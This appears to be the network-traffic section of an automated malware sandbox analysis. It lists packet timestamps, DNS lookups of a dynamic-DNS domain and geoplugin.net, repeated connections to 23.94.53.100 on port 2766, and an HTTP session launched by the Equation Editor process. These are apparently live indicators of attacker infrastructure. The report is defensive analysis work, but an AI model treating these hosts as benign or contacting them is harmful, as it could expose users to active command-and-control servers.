May 2, 2024 04:57:13.330455065 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.330476046 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.337928057 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347101927 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347121954 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347136021 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347148895 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347161055 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347173929 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347208023 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347227097 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347244978 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347289085 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347309113 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347347021 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347358942 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347385883 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347400904 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347400904 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347424984 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347434998 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347454071 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347492933 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347497940 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347557068 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347605944 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347605944 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347629070 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347654104 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347728968 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347762108 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347762108 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.347831011 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347846031 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.347886086 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.349018097 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.349039078 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.349121094 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.349666119 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354418039 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354439974 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354450941 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354501009 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354512930 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354521990 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354553938 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354566097 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354594946 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354626894 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354644060 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354685068 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354697943 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354698896 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354741096 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354752064 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354753971 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354808092 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354820013 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354866982 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354876041 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354876041 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354892015 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.354954958 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.354983091 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355026007 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355082989 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355098963 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355125904 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355143070 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355218887 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355242968 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355242968 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355282068 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355297089 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355308056 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355351925 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355361938 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355427980 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355443954 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355480909 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355494022 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355504990 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355544090 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355571985 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355583906 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355595112 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355623960 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355624914 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355638027 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355648994 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355671883 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355690956 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355706930 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355720997 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355731010 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355762959 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.355801105 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355813026 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.355859041 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.356756926 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356770992 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356781960 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356794119 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356825113 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356828928 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.356828928 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.356861115 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356873035 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356898069 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.356899977 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356913090 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356959105 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.356992006 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.356992006 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.357244015 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.438922882 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.438947916 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.438986063 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.438999891 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439012051 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439024925 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439040899 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439048052 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439073086 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439085007 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439096928 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439107895 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439119101 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439132929 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439163923 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439163923 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439163923 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439163923 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439163923 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439240932 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439256907 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439269066 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439281940 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439301968 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439301968 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439311981 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439325094 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.439376116 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.439979076 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440000057 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440023899 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440080881 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440109015 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440128088 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.440128088 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.440143108 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440161943 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.440167904 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440223932 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.440238953 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440253019 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440280914 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440293074 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440330982 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.440331936 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.440331936 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.447586060 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.447613955 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.447665930 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.456877947 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.456899881 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.456943989 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.456965923 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457017899 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457067013 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457067013 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457067966 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457067013 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457098961 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457148075 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457159042 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457197905 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457253933 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457303047 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457319975 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457367897 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457376957 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457434893 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457456112 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457490921 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457504034 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457549095 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457564116 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457623005 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457659006 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457684994 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457698107 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457772017 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457775116 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457788944 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457824945 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457870007 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.457874060 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457896948 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457937002 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.457942963 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458002090 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458009958 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458055019 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458096027 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458137035 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458157063 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458209038 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458257914 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458306074 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458388090 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458404064 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458508968 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458597898 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458611012 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458667994 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458739042 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458765984 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458811998 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458868980 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.458906889 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.458986044 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459021091 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.459078074 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459105968 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459151030 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.459197044 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459254026 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459319115 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459417105 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459429979 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.459460020 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.459527969 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459542036 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459566116 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.459599972 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.459820032 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.464179039 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464200020 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464241028 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464281082 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464303970 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464334965 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.464334965 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.464361906 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464387894 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464400053 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464420080 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464442015 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.464442015 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.464449883 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464484930 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464509964 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464550018 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.464550018 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.464554071 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464576960 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:13.464628935 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.468905926 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.479914904 CEST	80	49184	178.237.33.50	192.168.2.22
May 2, 2024 04:57:13.479990005 CEST	49184	80	192.168.2.22	178.237.33.50
May 2, 2024 04:57:13.480273008 CEST	49184	80	192.168.2.22	178.237.33.50
May 2, 2024 04:57:13.594847918 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:13.594934940 CEST	443	49181	172.217.1.4	192.168.2.22
May 2, 2024 04:57:13.595041990 CEST	49181	443	192.168.2.22	172.217.1.4
May 2, 2024 04:57:13.649221897 CEST	80	49184	178.237.33.50	192.168.2.22
May 2, 2024 04:57:13.649856091 CEST	49184	80	192.168.2.22	178.237.33.50
May 2, 2024 04:57:13.699637890 CEST	49182	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:13.861217022 CEST	2766	49182	23.94.53.100	192.168.2.22
May 2, 2024 04:57:14.649311066 CEST	80	49184	178.237.33.50	192.168.2.22
May 2, 2024 04:57:14.649369001 CEST	49184	80	192.168.2.22	178.237.33.50
May 2, 2024 04:57:18.728558064 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:18.838886023 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:18.839020014 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:18.949125051 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:18.949188948 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:18.949278116 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:19.059248924 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:19.059322119 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:19.059510946 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:19.059545040 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:19.059752941 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:19.170032978 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:19.173427105 CEST	2766	49183	23.94.53.100	192.168.2.22
May 2, 2024 04:57:19.173499107 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:19.189762115 CEST	49183	2766	192.168.2.22	23.94.53.100
May 2, 2024 04:57:19.299705982 CEST	2766	49183	23.94.53.100	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 04:55:54.835239887 CEST	138	138	192.168.2.22	192.168.2.255
May 2, 2024 04:55:58.813317060 CEST	52917	53	192.168.2.22	8.8.8.8
May 2, 2024 04:55:58.813500881 CEST	62751	53	192.168.2.22	8.8.8.8
May 2, 2024 04:55:58.904262066 CEST	53	52917	8.8.8.8	192.168.2.22
May 2, 2024 04:55:58.904740095 CEST	53	62751	8.8.8.8	192.168.2.22
May 2, 2024 04:56:03.388657093 CEST	53	54719	8.8.8.8	192.168.2.22
May 2, 2024 04:56:03.390331984 CEST	137	137	192.168.2.22	192.168.2.255
May 2, 2024 04:56:03.583270073 CEST	49881	53	192.168.2.22	8.8.8.8
May 2, 2024 04:56:03.583420992 CEST	54998	53	192.168.2.22	8.8.8.8
May 2, 2024 04:56:03.677237988 CEST	53	49881	8.8.8.8	192.168.2.22
May 2, 2024 04:56:03.677854061 CEST	53	54998	8.8.8.8	192.168.2.22
May 2, 2024 04:56:03.827219009 CEST	53	62672	8.8.8.8	192.168.2.22
May 2, 2024 04:56:04.139456034 CEST	137	137	192.168.2.22	192.168.2.255
May 2, 2024 04:56:04.889533997 CEST	137	137	192.168.2.22	192.168.2.255
May 2, 2024 04:56:10.005088091 CEST	53	58105	8.8.8.8	192.168.2.22
May 2, 2024 04:56:29.505350113 CEST	53	61618	8.8.8.8	192.168.2.22
May 2, 2024 04:56:36.228960991 CEST	53	63469	8.8.8.8	192.168.2.22
May 2, 2024 04:56:47.135312080 CEST	53	64956	8.8.8.8	192.168.2.22
May 2, 2024 04:56:58.716480970 CEST	53	65084	8.8.8.8	192.168.2.22
May 2, 2024 04:57:06.048381090 CEST	53	51014	8.8.8.8	192.168.2.22
May 2, 2024 04:57:10.524168015 CEST	53060	53	192.168.2.22	8.8.8.8
May 2, 2024 04:57:10.621205091 CEST	53	53060	8.8.8.8	192.168.2.22
May 2, 2024 04:57:13.203659058 CEST	49949	53	192.168.2.22	8.8.8.8
May 2, 2024 04:57:13.302244902 CEST	53	49949	8.8.8.8	192.168.2.22
May 2, 2024 04:57:17.800558090 CEST	137	137	192.168.2.22	192.168.2.255
May 2, 2024 04:57:18.547076941 CEST	137	137	192.168.2.22	192.168.2.255
May 2, 2024 04:57:19.311418056 CEST	137	137	192.168.2.22	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 2, 2024 04:55:58.813317060 CEST	192.168.2.22	8.8.8.8	0x4ab	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 2, 2024 04:55:58.813500881 CEST	192.168.2.22	8.8.8.8	0x4ee6	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 2, 2024 04:56:03.583270073 CEST	192.168.2.22	8.8.8.8	0xe006	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 2, 2024 04:56:03.583420992 CEST	192.168.2.22	8.8.8.8	0xee75	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 2, 2024 04:57:10.524168015 CEST	192.168.2.22	8.8.8.8	0x88b6	Standard query (0)	yuahdgbceja.sytes.net	A (IP address)	IN (0x0001)	false
May 2, 2024 04:57:13.203659058 CEST	192.168.2.22	8.8.8.8	0x3989	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 2, 2024 04:55:58.904262066 CEST	8.8.8.8	192.168.2.22	0x4ab	No error (0)	www.google.com	172.217.1.4	A (IP address)	IN (0x0001)	false
May 2, 2024 04:55:58.904740095 CEST	8.8.8.8	192.168.2.22	0x4ee6	No error (0)	www.google.com		65	IN (0x0001)	false
May 2, 2024 04:56:03.677237988 CEST	8.8.8.8	192.168.2.22	0xe006	No error (0)	www.google.com	172.217.1.4	A (IP address)	IN (0x0001)	false
May 2, 2024 04:56:03.677854061 CEST	8.8.8.8	192.168.2.22	0xee75	No error (0)	www.google.com		65	IN (0x0001)	false
May 2, 2024 04:57:10.621205091 CEST	8.8.8.8	192.168.2.22	0x88b6	No error (0)	yuahdgbceja.sytes.net	23.94.53.100	A (IP address)	IN (0x0001)	false
May 2, 2024 04:57:13.302244902 CEST	8.8.8.8	192.168.2.22	0x3989	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

23.94.54.101

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	23.94.54.101	80	800	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

